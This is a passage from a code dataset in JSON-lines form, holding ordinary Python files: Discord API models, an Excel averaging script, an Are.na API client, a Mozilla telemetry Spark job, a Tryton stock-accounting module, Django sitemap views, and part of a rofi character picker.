tags: List[str]\n\n @validator(\"extra_owners\")\n def extra_owner_converter(cls, v, values, **kwargs):\n eos = []\n [eos.append(int(eo)) for eo in v if eo.isdigit() and eo not in eos]\n return eos\n\nclass OwnershipTransfer(BaseModel):\n new_owner: str\n\n @validator(\"new_owner\")\n def new_owner_validator(cls, v, values, **kwargs):\n try:\n new_owner = str(v)\n except:\n raise ValueError(\"Invalid new owner\")\n return new_owner\n\nclass BotAppeal(BaseModel):\n appeal: str\n\n","sub_path":"modules/discord/api/v2/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"415871963","text":"# -*- coding: utf-8 -*-\nimport os\nimport glob\nimport xlrd\n\n\ndef heightEx(xlsfile):\n wb = xlrd.open_workbook(xlsfile)\n sheet = wb.sheet_by_name('フリー線分')\n return sheet.cell_value(49,11)\n\n\ndef main():\n l = glob.glob(\"./*.xls\")\n FTlist = [[0 for i in range(2)] for j in range(9)]\n ds = ['d2.5', 'd1.4', 'd0.8', 'd0.6', 'd0.4', 'd0.2', 'd0.1']\n\n for x,name in enumerate(l):\n print(name, heightEx(name))\n FTlist[0][0] += 1\n FTlist[0][1] += heightEx(name)\n\n for y, d in enumerate(ds):\n if d in name:\n idx = y + 1\n break\n else:\n idx = len(ds) + 1\n\n FTlist[idx][0] += 1\n FTlist[idx][1] += heightEx(name)\n\n for z in range(9):\n if FTlist[z][0] != 0:\n print(\"No.\", z, \"ファイル数\", FTlist[z][0], \"合計値\", FTlist[z][1], \"平均値\", FTlist[z][1] / FTlist[z][0])\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"FilmThickness.py","file_name":"FilmThickness.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322450088","text":"import requests\nfrom functools import wraps\n\nBASE_URL = 'http://api.are.na/v2'\n\n\ndef paginated(fn):\n @wraps(fn)\n def decorated(*args, page=0, per_page=15, **kwargs):\n params = kwargs.get('params', {})\n params.update({\n 'page': page,\n 'per': per_page})\n kwargs['params'] = params\n return fn(*args, **kwargs)\n return decorated\n\n\nclass Resource():\n def __init__(self, access_token=None):\n self.access_token = access_token\n\n def _headers(self, auth):\n if auth:\n if self.access_token is not None:\n return {\n 'Authorization': 'Bearer {}'.format(self.access_token)\n }\n elif self.auth_token is not None:\n return {\n 'X-AUTH-TOKEN': self.auth_token\n }\n raise AttributeError('No access token or auth token is set')\n return {}\n\n def _get(self, endpoint, params=None, auth=False):\n resp = requests.get(\n ''.join([BASE_URL, self.base_endpoint, endpoint]),\n params=params or {},\n headers=self._headers(auth))\n if resp.status_code != 200:\n resp.raise_for_status()\n return resp.json()\n\n def _post(self, endpoint, data, params=None):\n resp = requests.post(\n ''.join([BASE_URL, self.base_endpoint, endpoint]),\n params=params or {},\n headers=self._headers(True),\n json=data)\n if resp.status_code != 200:\n resp.raise_for_status()\n return resp.json()\n\n def _put(self, endpoint, data, params=None):\n resp = requests.put(\n ''.join([BASE_URL, self.base_endpoint, endpoint]),\n params=params or {},\n headers=self._headers(True),\n json=data)\n if resp.status_code != 200:\n resp.raise_for_status()\n return resp.json()\n\n def _delete(self, endpoint, params=None):\n resp = requests.delete(\n ''.join([BASE_URL, self.base_endpoint, endpoint]),\n params=params or {},\n headers=self._headers(True))\n if resp.status_code != 200:\n resp.raise_for_status()\n return resp.json()\n","sub_path":"arena/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"152498498","text":"import logging\nimport operator\nfrom datetime import datetime\n\nimport arrow\nimport click\nfrom pyspark.sql import types, SparkSession, functions as F\nfrom pyspark.sql.window import Window\n\nfrom mozetl.topline.schema import topline_schema\nfrom mozetl.constants import SEARCH_SOURCE_WHITELIST\nfrom functools import reduce\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# fmt: off\ncountries = {\n \"AD\", \"AE\", \"AF\", \"AG\", \"AI\", \"AL\", \"AM\", \"AO\", \"AQ\", \"AR\", \"AS\",\n \"AT\", \"AU\", \"AW\", \"AX\", \"AZ\", \"BA\", \"BB\", \"BD\", \"BE\", \"BF\", \"BG\",\n \"BH\", \"BI\", \"BJ\", \"BL\", \"BM\", \"BN\", \"BO\", \"BQ\", \"BR\", \"BS\", \"BT\",\n \"BV\", \"BW\", \"BY\", \"BZ\", \"CA\", \"CC\", \"CD\", \"CF\", \"CG\", \"CH\", \"CI\",\n \"CK\", \"CL\", \"CM\", \"CN\", \"CO\", \"CR\", \"CU\", \"CV\", \"CW\", \"CX\", \"CY\",\n \"CZ\", \"DE\", \"DJ\", \"DK\", \"DM\", \"DO\", \"DZ\", \"EC\", \"EE\", \"EG\", \"EH\",\n \"ER\", \"ES\", \"ET\", \"FI\", \"FJ\", \"FK\", \"FM\", \"FO\", \"FR\", \"GA\", \"GB\",\n \"GD\", \"GE\", \"GF\", \"GG\", \"GH\", \"GI\", \"GL\", \"GM\", \"GN\", \"GP\", \"GQ\",\n \"GR\", \"GS\", \"GT\", \"GU\", \"GW\", \"GY\", \"HK\", \"HM\", \"HN\", \"HR\", \"HT\",\n \"HU\", \"ID\", \"IE\", \"IL\", \"IM\", \"IN\", \"IO\", \"IQ\", \"IR\", \"IS\", \"IT\",\n \"JE\", \"JM\", \"JO\", \"JP\", \"KE\", \"KG\", \"KH\", \"KI\", \"KM\", \"KN\", \"KP\",\n \"KR\", \"KW\", \"KY\", \"KZ\", \"LA\", \"LB\", \"LC\", \"LI\", \"LK\", \"LR\", \"LS\",\n \"LT\", \"LU\", \"LV\", \"LY\", \"MA\", \"MC\", \"MD\", \"ME\", \"MF\", \"MG\", \"MH\",\n \"MK\", \"ML\", \"MM\", \"MN\", \"MO\", \"MP\", \"MQ\", \"MR\", \"MS\", \"MT\", \"MU\",\n \"MV\", \"MW\", \"MX\", \"MY\", \"MZ\", \"NA\", \"NC\", \"NE\", \"NF\", \"NG\", \"NI\",\n \"NL\", \"NO\", \"NP\", \"NR\", \"NU\", \"NZ\", \"OM\", \"PA\", \"PE\", \"PF\", \"PG\",\n \"PH\", \"PK\", \"PL\", \"PM\", \"PN\", \"PR\", \"PS\", \"PT\", \"PW\", \"PY\", \"QA\",\n \"RE\", \"RO\", \"RS\", \"RU\", \"RW\", \"SA\", \"SB\", \"SC\", \"SD\", \"SE\", \"SG\",\n \"SH\", \"SI\", \"SJ\", \"SK\", \"SL\", \"SM\", \"SN\", \"SO\", \"SR\", \"SS\", \"ST\",\n \"SV\", \"SX\", \"SY\", \"SZ\", \"TC\", \"TD\", \"TF\", \"TG\", \"TH\", \"TJ\", \"TK\",\n \"TL\", \"TM\", \"TN\", \"TO\", \"TR\", \"TT\", \"TV\", \"TW\", \"TZ\", \"UA\", \"UG\",\n \"UM\", \"US\", \"UY\", \"UZ\", \"VA\", \"VC\", \"VE\", \"VG\", \"VI\", \"VN\", \"VU\",\n \"WF\", \"WS\", \"YE\", \"YT\", \"ZA\", \"ZM\", \"ZW\"\n}\n# fmt: on\n\nseconds_per_hour = 60 * 60\nseconds_per_day = seconds_per_hour * 24\n\n\ndef column_like(name, patterns, default):\n \"\"\" patterns: dict[label, list[match_expr]]\"\"\"\n # start with the pyspark.sql.functions\n op = F\n for label in patterns:\n cond = reduce(\n operator.__or__, [F.col(name).like(pat) for pat in patterns[label]]\n )\n op = op.when(cond, label)\n return op.otherwise(default)\n\n\ndef clean_input(dataframe, start, end):\n input_columns = [\n \"client_id\",\n \"timestamp\",\n \"is_default_browser\",\n \"search_counts\",\n \"country\",\n \"profile_creation_date\",\n \"channel\",\n \"os\",\n \"hours\",\n ]\n columns = {col: F.col(col) for col in input_columns}\n\n # normalize countries against a whitelist\n columns[\"country\"] = (\n F.when(F.col(\"country\").isin(countries), F.col(\"country\"))\n .otherwise(\"Other\")\n .alias(\"country\")\n )\n\n # clean operating system based on CEP naming scheme\n pattern = {\n \"Windows\": [\"Windows%\", \"WINNT%\"],\n \"Mac\": [\"Darwin%\"],\n \"Linux\": [\"%Linux%\", \"%BSD%\", \"%SunOS%\"],\n }\n columns[\"os\"] = column_like(\"os\", pattern, \"Other\")\n\n # rename normalized channel to channel\n columns[\"channel\"] = F.col(\"normalized_channel\")\n\n # convert profile creation date into seconds (day -> seconds)\n columns[\"profile_creation_date\"] = (\n F.when(\n F.col(\"profile_creation_date\") >= 0,\n F.col(\"profile_creation_date\") * seconds_per_day,\n )\n .otherwise(0.0)\n .cast(types.DoubleType())\n )\n\n # generate hours of usage from subsession length (seconds -> hours)\n columns[\"hours\"] = (\n F.when(\n (F.col(\"subsession_length\") >= 0)\n & (F.col(\"subsession_length\") < 180 * seconds_per_day),\n F.col(\"subsession_length\") / seconds_per_hour,\n )\n .otherwise(0.0)\n .cast(types.DoubleType())\n )\n\n # clean the dataset\n clean = (\n dataframe.where(F.col(\"submission_date_s3\") >= start)\n .where(F.col(\"submission_date_s3\") < end)\n .select([expr.alias(name) for name, expr in columns.items()])\n )\n\n return clean\n\n\ndef search_aggregates(dataframe, attributes):\n # search engines to pivot against\n search_labels = [\"google\", \"bing\", \"yahoo\", \"other\"]\n\n # patterns to filter search engines\n patterns = {\n \"google\": [\"%Google%\", \"%google%\"],\n \"bing\": [\"%Bing%\", \"%bing%\"],\n \"yahoo\": [\"%Yahoo%\", \"%yahoo%\"],\n }\n\n s_engine = column_like(\"search_count.engine\", patterns, \"other\").alias(\"engine\")\n s_count = (\n F.when(F.col(\"search_count.count\") > 0, F.col(\"search_count.count\"))\n .otherwise(0)\n .alias(\"count\")\n )\n\n # generate the search aggregates by exploding and pivoting\n search = (\n dataframe.withColumn(\"search_count\", F.explode(\"search_counts\"))\n .where(\n F.col(\"search_count.source\").isNull()\n | F.col(\"search_count.source\").isin(SEARCH_SOURCE_WHITELIST)\n )\n .select(\"country\", \"channel\", \"os\", s_engine, s_count)\n .groupBy(attributes)\n .pivot(\"engine\", search_labels)\n .agg(F.sum(\"count\"))\n .na.fill(0, search_labels)\n )\n\n return search\n\n\ndef hours_aggregates(dataframe, attributes):\n \"\"\" Aggregate hours over the set of attributes\"\"\"\n # simple aggregate\n hours = dataframe.groupBy(attributes).agg(F.sum(\"hours\").alias(\"hours\"))\n return hours\n\n\ndef client_aggregates(dataframe, timestamp, attributes):\n \"\"\"Aggregates clients by properties such as being new or set as default. \"\"\"\n\n select_expr = {col: F.col(col) for col in attributes}\n\n select_expr[\"new_client\"] = F.when(\n F.col(\"profile_creation_date\") >= timestamp, 1\n ).otherwise(0)\n\n select_expr[\"default_client\"] = F.when(F.col(\"is_default_browser\"), 1).otherwise(0)\n\n select_expr[\"clientid_rank\"] = F.row_number().over(\n Window.partitionBy(\"client_id\").orderBy(F.desc(\"timestamp\"))\n )\n\n clients = (\n dataframe.select([expr.alias(name) for name, expr in select_expr.items()])\n .where(\"clientid_rank = 1\")\n .groupBy(attributes)\n .agg(\n F.count(\"*\").alias(\"actives\"),\n F.sum(\"new_client\").alias(\"new_records\"),\n F.sum(\"default_client\").alias(\"default\"),\n )\n )\n\n return clients\n\n\ndef transform(dataframe, start, mode):\n # attributes that break down the aggregates\n attributes = [\"country\", \"channel\", \"os\"]\n\n end = get_end_date(start, mode)\n # clean the dataset\n df = clean_input(dataframe, start, end)\n\n # find the timestamp in seconds to find new profiles\n report_delta = datetime.strptime(start, \"%Y%m%d\") - datetime(1970, 1, 1)\n report_timestamp = report_delta.total_seconds()\n\n # generate aggregates\n clients = client_aggregates(df, report_timestamp, attributes)\n searches = search_aggregates(df, attributes)\n hours = hours_aggregates(df, attributes)\n\n # take the outer join of all aggregates and replace null values with zeros\n return (\n clients.join(searches, attributes, \"outer\")\n .join(hours, attributes, \"outer\")\n .withColumnRenamed(\"country\", \"geo\")\n .withColumn(\"crashes\", F.lit(0).astype(\"long\"))\n .na.fill(0)\n )\n\n\ndef get_end_date(ds_start, period):\n \"\"\" Return the end date given the start date and period. \"\"\"\n date_start = arrow.get(ds_start, \"YYYYMMDD\")\n if period == \"monthly\":\n date_end = date_start.replace(months=+1)\n else:\n date_end = date_start.replace(days=+7)\n ds_end = date_end.format(\"YYYYMMDD\")\n\n return ds_end\n\n\ndef format_spark_path(bucket, prefix):\n return \"s3://{}/{}\".format(bucket, prefix)\n\n\ndef extract(spark, path):\n \"\"\"Extract the source dataframe from the spark compatible path.\n\n spark: SparkSession\n path: path to parquet files in s3\n ds_start: inclusive date\n \"\"\"\n return spark.read.option(\"mergeSchema\", \"true\").parquet(path)\n\n\ndef save(dataframe, bucket, prefix, version, mode, start_date):\n prefix = \"{}/v{}/mode={}/report_start={}\".format(prefix, version, mode, start_date)\n location = format_spark_path(bucket, prefix)\n logger.info(\"Writing topline summary to {}\".format(location))\n\n # report start is implicit in the partition path\n fields = [col for col in topline_schema.names if col != \"report_start\"]\n (dataframe.select(fields).repartition(1).write.parquet(location, mode=\"overwrite\"))\n\n\n@click.command()\n@click.argument(\"start_date\")\n@click.argument(\"mode\", type=click.Choice([\"weekly\", \"monthly\"]))\n@click.argument(\"bucket\")\n@click.argument(\"prefix\")\n@click.option(\n \"--input_bucket\", default=\"telemetry-parquet\", help=\"Bucket of the input dataset\"\n)\n@click.option(\n \"--input_prefix\", default=\"main_summary/v4\", help=\"Prefix of the input dataset\"\n)\ndef main(start_date, mode, bucket, prefix, input_bucket, input_prefix):\n spark = SparkSession.builder.appName(\"topline_summary\").getOrCreate()\n\n version = 1\n source_path = format_spark_path(input_bucket, input_prefix)\n\n logger.info(\"Loading main_summary into memory...\")\n main_summary = extract(spark, source_path)\n\n logger.info(\"Running the topline summary...\")\n rollup = transform(main_summary, start_date, mode)\n\n logger.info(\"Saving rollup to disk...\")\n save(rollup, bucket, prefix, version, mode, start_date)\n","sub_path":"mozetl/topline/topline_summary.py","file_name":"topline_summary.py","file_ext":"py","file_size_in_byte":9463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"524911559","text":"# This file is part of Tryton. The COPYRIGHT file at the top level of\n# this repository contains the full copyright notices and license terms.\nfrom decimal import Decimal\n\nfrom trytond import backend\nfrom trytond.i18n import gettext\nfrom trytond.model import ModelView, fields\nfrom trytond.wizard import Wizard, StateView, StateTransition, Button\nfrom trytond.pyson import Eval\nfrom trytond.transaction import Transaction\nfrom trytond.pool import Pool, PoolMeta\n\nfrom trytond.modules.account_product.product import (\n account_used, template_property)\nfrom trytond.modules.product import price_digits\nfrom .exceptions import ModifyCostPriceError\n\n__all__ = ['Category', 'CategoryAccount', 'Template',\n 'Product', 'ModifyCostPriceAsk',\n 'ModifyCostPriceShowMove', 'ModifyCostPrice']\naccount_names = [\n 'account_stock', 'account_stock_supplier', 'account_stock_customer',\n 'account_stock_production', 'account_stock_lost_found']\n\n\nclass Category(metaclass=PoolMeta):\n __name__ = 'product.category'\n account_stock = fields.MultiValue(fields.Many2One(\n 'account.account', \"Account Stock\",\n domain=[\n ('type.stock', '=', True),\n ('company', '=', Eval('context', {}).get('company', -1)),\n ],\n states={\n 'invisible': (~Eval('context', {}).get('company')\n | Eval('account_parent')\n | ~Eval('accounting', False)),\n },\n depends=['account_parent', 'accounting']))\n account_stock_supplier = fields.MultiValue(fields.Many2One(\n 'account.account', \"Account Stock Supplier\",\n domain=[\n ('type.stock', '=', True),\n ('company', '=', Eval('context', {}).get('company', -1)),\n ],\n states={\n 'invisible': (~Eval('context', {}).get('company')\n | Eval('account_parent')\n | ~Eval('accounting', False)),\n },\n depends=['account_parent', 'accounting']))\n account_stock_customer = fields.MultiValue(fields.Many2One(\n 'account.account', \"Account Stock Customer\",\n domain=[\n ('type.stock', '=', True),\n ('company', '=', Eval('context', {}).get('company', -1)),\n ],\n states={\n 'invisible': (~Eval('context', {}).get('company')\n | Eval('account_parent')\n | ~Eval('accounting', False)),\n },\n depends=['account_parent', 'accounting']))\n account_stock_production = fields.MultiValue(fields.Many2One(\n 'account.account', \"Account Stock Production\",\n domain=[\n ('type.stock', '=', True),\n ('company', '=', Eval('context', {}).get('company', -1)),\n ],\n states={\n 'invisible': (~Eval('context', {}).get('company')\n | Eval('account_parent')\n | ~Eval('accounting', False)),\n },\n depends=['account_parent', 'accounting']))\n account_stock_lost_found = fields.MultiValue(fields.Many2One(\n 'account.account', \"Account Stock Lost and Found\",\n domain=[\n ('type.stock', '=', True),\n ('company', '=', Eval('context', {}).get('company', -1)),\n ],\n states={\n 'invisible': (~Eval('context', {}).get('company')\n | Eval('account_parent')\n | ~Eval('accounting', False)),\n },\n depends=['account_parent', 'accounting']))\n\n @classmethod\n def multivalue_model(cls, field):\n pool = Pool()\n if field in account_names:\n return pool.get('product.category.account')\n return super(Category, cls).multivalue_model(field)\n\n @property\n @account_used('account_stock')\n def account_stock_used(self):\n pass\n\n @property\n @account_used('account_stock_supplier')\n def account_stock_supplier_used(self):\n pass\n\n @property\n @account_used('account_stock_customer')\n def account_stock_customer_used(self):\n pass\n\n @property\n @account_used('account_stock_production')\n def account_stock_production_used(self):\n pass\n\n @property\n @account_used('account_stock_lost_found')\n def account_stock_lost_found_used(self):\n pass\n\n\nclass CategoryAccount(metaclass=PoolMeta):\n __name__ = 'product.category.account'\n account_stock = fields.Many2One(\n 'account.account', \"Account Stock\",\n domain=[\n ('type.stock', '=', True),\n ('type.statement', '=', 'balance'),\n ('company', '=', Eval('company', -1)),\n ],\n depends=['company'])\n account_stock_supplier = fields.Many2One(\n 'account.account', \"Account Stock Supplier\",\n domain=[\n ('type.stock', '=', True),\n ('type.statement', '=', 'income'),\n ('company', '=', Eval('company', -1)),\n ],\n depends=['company'])\n account_stock_customer = fields.Many2One(\n 'account.account', \"Account Stock Customer\",\n domain=[\n ('type.stock', '=', True),\n ('type.statement', '=', 'income'),\n ('company', '=', Eval('company', -1)),\n ],\n depends=['company'])\n account_stock_production = fields.Many2One(\n 'account.account', \"Account Stock Production\",\n domain=[\n ('type.stock', '=', True),\n ('type.statement', '=', 'income'),\n ('company', '=', Eval('company', -1)),\n ],\n depends=['company'])\n account_stock_lost_found = fields.Many2One(\n 'account.account', \"Account Stock Lost and Found\",\n domain=[\n ('type.stock', '=', True),\n ('type.statement', '=', 'income'),\n ('company', '=', Eval('company', -1)),\n ],\n depends=['company'])\n\n @classmethod\n def __register__(cls, module_name):\n TableHandler = backend.get('TableHandler')\n exist = TableHandler.table_exist(cls._table)\n if exist:\n table = cls.__table_handler__(module_name)\n exist &= all(table.column_exist(c) for c in account_names)\n\n super(CategoryAccount, cls).__register__(module_name)\n\n if not exist:\n # Re-migration\n cls._migrate_property([], [], [])\n\n @classmethod\n def _migrate_property(cls, field_names, value_names, fields):\n field_names.extend(account_names)\n value_names.extend(account_names)\n super(CategoryAccount, cls)._migrate_property(\n field_names, value_names, fields)\n\n\nclass Template(metaclass=PoolMeta):\n __name__ = 'product.template'\n\n @classmethod\n def __setup__(cls):\n super(Template, cls).__setup__()\n cls._modify_no_move.append(\n ('cost_price',\n 'account_stock_continental.msg_product_change_cost_price'))\n\n @property\n @account_used('account_stock', 'account_category')\n def account_stock_used(self):\n pass\n\n @property\n @account_used('account_stock_supplier', 'account_category')\n def account_stock_supplier_used(self):\n pass\n\n @property\n @account_used('account_stock_customer', 'account_category')\n def account_stock_customer_used(self):\n pass\n\n @property\n @account_used('account_stock_production', 'account_category')\n def account_stock_production_used(self):\n pass\n\n @property\n @account_used('account_stock_lost_found', 'account_category')\n def account_stock_lost_found_used(self):\n pass\n\n\nclass Product(metaclass=PoolMeta):\n __name__ = 'product.product'\n account_stock_used = template_property('account_stock_used')\n account_stock_supplier_used = template_property(\n 'account_stock_supplier_used')\n account_stock_customer_used = template_property(\n 'account_stock_customer_used')\n account_stock_production_used = template_property(\n 'account_stock_production_used')\n account_stock_lost_found_used = template_property(\n 'account_stock_lost_found_used')\n\n\nclass ModifyCostPriceAsk(ModelView):\n 'Modify Cost Price Ask'\n __name__ = 'product.modify_cost_price.ask'\n template = fields.Many2One('product.template', 'Product', readonly=True,\n states={\n 'invisible': ~Eval('template'),\n })\n product = fields.Many2One('product.product', 'Variant', readonly=True,\n states={\n 'invisible': ~Eval('product'),\n })\n cost_price = fields.Numeric('Cost Price', required=True,\n digits=price_digits)\n\n\nclass ModifyCostPriceShowMove(ModelView):\n 'Modify Cost Price Show Move'\n __name__ = 'product.modify_cost_price.show_move'\n price_difference = fields.Numeric('Price Difference', readonly=True,\n digits=price_digits)\n amount = fields.Numeric('Amount', readonly=True,\n digits=(16, Eval('currency_digits', 2)), depends=['currency_digits'])\n currency_digits = fields.Integer('Currency Digits', readonly=True)\n journal = fields.Many2One('account.journal', 'Journal', required=True)\n stock_account = fields.Many2One('account.account', 'Stock Account',\n readonly=True)\n counterpart = fields.Many2One('account.account', 'Counterpart',\n domain=[\n ('company', 'in',\n [Eval('context', {}).get('company', -1), None]),\n ('id', '!=', Eval('stock_account')),\n ('type.stock', '=', True),\n ],\n depends=['stock_account'], required=True)\n description = fields.Char('Description')\n\n\nclass ModifyCostPrice(Wizard):\n 'Modify Cost Price'\n __name__ = 'product.modify_cost_price'\n start_state = 'ask_price'\n ask_price = StateView('product.modify_cost_price.ask',\n 'account_stock_continental.modify_cost_price_ask_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('OK', 'should_show_move', 'tryton-forward', default=True),\n ])\n should_show_move = StateTransition()\n show_move = StateView('product.modify_cost_price.show_move',\n 'account_stock_continental.modify_cost_price_show_move_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('OK', 'create_move', 'tryton-ok', default=True),\n ])\n create_move = StateTransition()\n modify_price = StateTransition()\n\n def default_ask_price(self, fields):\n pool = Pool()\n Product = pool.get('product.product')\n\n context = Transaction().context\n default = {}\n product = Product(context['active_id'])\n default['product'] = product.id\n default['cost_price'] = getattr(\n product, 'recompute_cost_price_%s' % product.cost_price_method)()\n return default\n\n @staticmethod\n def get_product():\n 'Return the product instance'\n pool = Pool()\n Product = pool.get('product.product')\n context = Transaction().context\n return Product(context['active_id'])\n\n @classmethod\n def get_quantity(cls):\n pool = Pool()\n Date = pool.get('ir.date')\n Stock = pool.get('stock.location')\n\n locations = Stock.search([('type', '=', 'storage')])\n stock_date_end = Date.today()\n with Transaction().set_context(locations=[l.id for l in locations],\n stock_date_end=stock_date_end):\n product = cls.get_product()\n return product.quantity\n\n def transition_should_show_move(self):\n if self.get_quantity() != 0:\n return 'show_move'\n return 'modify_price'\n\n def default_show_move(self, fields):\n pool = Pool()\n User = pool.get('res.user')\n AccountConfiguration = pool.get('account.configuration')\n\n product = self.get_product()\n price_diff = (self.ask_price.cost_price\n - product.cost_price)\n user = User(Transaction().user)\n amount = user.company.currency.round(\n Decimal(str(self.get_quantity())) * price_diff)\n stock_account_id = product.account_stock_used.id\n config = AccountConfiguration(1)\n stock_journal_id = config.stock_journal.id\n counterpart_id = (config.cost_price_counterpart_account.id if\n config.cost_price_counterpart_account else None)\n return {\n 'journal': stock_journal_id,\n 'amount': amount,\n 'price_difference': price_diff,\n 'stock_account': stock_account_id,\n 'counterpart': counterpart_id,\n 'currency_digits': user.company.currency.digits,\n }\n\n def get_move_lines(self):\n Line = Pool().get('account.move.line')\n amount = self.show_move.amount\n return [Line(\n debit=amount if amount > 0 else 0,\n credit=-amount if amount < 0 else 0,\n account=self.show_move.stock_account,\n ),\n Line(\n debit=-amount if amount < 0 else 0,\n credit=amount if amount > 0 else 0,\n account=self.show_move.counterpart,\n ),\n ]\n\n def get_move(self):\n pool = Pool()\n Date = pool.get('ir.date')\n Period = pool.get('account.period')\n User = pool.get('res.user')\n Move = pool.get('account.move')\n\n user = User(Transaction().user)\n period_id = Period.find(user.company.id)\n return Move(\n description=self.show_move.description,\n period=period_id,\n journal=self.show_move.journal,\n date=Date.today(),\n origin=self.get_product(),\n lines=self.get_move_lines(),\n )\n\n def transition_create_move(self):\n Move = Pool().get('account.move')\n\n if self.show_move.counterpart == self.show_move.stock_account:\n raise ModifyCostPriceError(\n gettext('account_stock_continental'\n '.msg_modify_cost_price_same_account',\n account=self.show_move.counterpart.rec_name))\n move = self.get_move()\n move.save()\n Move.post([move])\n return 'modify_price'\n\n def transition_modify_price(self):\n self.ask_price.product.set_multivalue(\n 'cost_price', self.ask_price.cost_price)\n return 'end'\n","sub_path":"account_stock_continental/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":14487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"635005469","text":"from django.http import HttpResponse, Http404\r\nfrom django.template import loader\r\nfrom django.contrib.sites.models import get_current_site\r\nfrom django.core import urlresolvers\r\nfrom django.utils.encoding import smart_str\r\nfrom django.core.paginator import EmptyPage, PageNotAnInteger\r\n\r\ndef index(request, sitemaps):\r\n current_site = get_current_site(request)\r\n sites = []\r\n protocol = request.is_secure() and 'https' or 'http'\r\n for section, site in sitemaps.items():\r\n site.request = request\r\n if callable(site):\r\n pages = site().paginator.num_pages\r\n else:\r\n pages = site.paginator.num_pages\r\n sitemap_url = urlresolvers.reverse('django.contrib.sitemaps.views.sitemap', kwargs={'section': section})\r\n sites.append('%s://%s%s' % (protocol, current_site.domain, sitemap_url))\r\n if pages > 1:\r\n for page in range(2, pages+1):\r\n sites.append('%s://%s%s?p=%s' % (protocol, current_site.domain, sitemap_url, page))\r\n xml = loader.render_to_string('sitemap_index.xml', {'sitemaps': sites})\r\n return HttpResponse(xml, mimetype='application/xml')\r\n\r\ndef sitemap(request, sitemaps, section=None):\r\n maps, urls = [], []\r\n if section is not None:\r\n if section not in sitemaps:\r\n raise Http404(\"No sitemap available for section: %r\" % section)\r\n maps.append(sitemaps[section])\r\n else:\r\n maps = sitemaps.values()\r\n page = request.GET.get(\"p\", 1)\r\n current_site = get_current_site(request)\r\n for site in maps:\r\n try:\r\n if callable(site):\r\n urls.extend(site().get_urls(page=page, site=current_site))\r\n else:\r\n urls.extend(site.get_urls(page=page, site=current_site))\r\n except EmptyPage:\r\n raise Http404(\"Page %s empty\" % page)\r\n except PageNotAnInteger:\r\n raise Http404(\"No page '%s'\" % page)\r\n xml = smart_str(loader.render_to_string('sitemap.xml', {'urlset': urls}))\r\n return HttpResponse(xml, mimetype='application/xml')\r\n","sub_path":"django/contrib/sitemaps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282706981","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport argparse\nimport fnmatch\nimport os\nimport shlex\nimport sys\nfrom subprocess import run\nfrom typing import List, Tuple\n\nimport configargparse\nfrom xdg import BaseDirectory\n\nfrom rofigeneric.Clipboarder import Clipboarder\nfrom rofigeneric.Typer import Typer\n\n\nclass RofiGeneric:\n def __init__(self) -> None:\n self.args = self.parse_arguments()\n self.typer = Typer.best_option(self.args.typer)\n self.clipboarder = Clipboarder.best_option(self.args.clipboarder)\n self.active_window = self.typer.get_active_window()\n\n returncode, stdout = self.open_main_rofi_window()\n\n if returncode == 1:\n sys.exit()\n else:\n if 10 <= returncode <= 19:\n self.default_handle_recent_character(returncode - 9)\n else:\n # for now we assume stdout is a single line\n assert len(stdout.splitlines()) == 1\n\n # TODO(g.seux): we can easily make extraction of the line configurable\n # for now we select the first word\n output=stdout.split()[0]\n\n # TODO(g.seux): deal with history\n # self.save_characters_to_recent_file(characters)\n\n if returncode == 0:\n self.default_handle(output)\n #elif returncode == 20:\n # self.clipboarder.copy_characters_to_clipboard(characters)\n #elif returncode == 21:\n # self.typer.type_characters(characters, self.active_window)\n #elif returncode == 22:\n # self.clipboarder.copy_paste_characters(characters, self.active_window, self.typer)\n #elif returncode == 23:\n # self.default_handle(self.get_codepoints(characters))\n #elif returncode == 24:\n # self.clipboarder.copy_characters_to_clipboard(self.get_codepoints(characters))\n\n def parse_arguments(self) -> argparse.Namespace:\n parser = configargparse.ArgumentParser(\n description='Select, insert or copy Unicode characters using rofi.',\n default_config_files=[os.path.join(directory, 'rofigeneric.rc') for directory in\n BaseDirectory.xdg_config_dirs]\n )\n parser.add_argument('--version', action='version', version='rofi-generic 0.1.0')\n parser.add_argument(\n '--insert-with-clipboard',\n '-p',\n dest='insert_with_clipboard',\n action='store_true',\n help='Do not type the character directly, but copy it to the clipboard, insert it from '\n 'there and then restore the clipboard\\'s original value '\n )\n parser.add_argument(\n '--copy-only',\n '-c',\n dest='copy_only',\n action='store_true',\n help='Only copy the character to the clipboard but do not insert it'\n )\n parser.add_argument(\n '--input-files',\n '-f',\n dest='files',\n action='store',\n default=[],\n nargs='+',\n metavar='FILE',\n help='Read text from files'\n )\n parser.add_argument(\n '--prompt',\n '-r',\n dest='prompt',\n action='store',\n default='😀 ',\n help='Set rofi-generic\\'s prompt'\n )\n parser.add_argument(\n '--rofi-args',\n dest='rofi_args',\n action='store',\n default='',\n help='A string of arguments to give to rofi'\n )\n parser.add_argument(\n '--max-recent',\n dest='max_recent',\n action='store',\n type=int,\n default=10,\n help='Show at most this number of recently used words (cannot be larger than 10)'\n )\n parser.add_argument(\n '--clipboarder',\n dest='clipboarder',\n action='store',\n type=str,\n default=None,\n help='Choose the application to access the clipboard with'\n )\n parser.add_argument(\n '--typer',\n dest='typer',\n action='store',\n type=str,\n default=None,\n help='Choose the application to type with'\n )\n\n parsed_args = parser.parse_args()\n parsed_args.rofi_args = shlex.split(parsed_args.rofi_args)\n\n return parsed_args\n\n def read_input_files(self) -> str:\n entries = []\n\n for file_name in self.args.files:\n entries = entries + 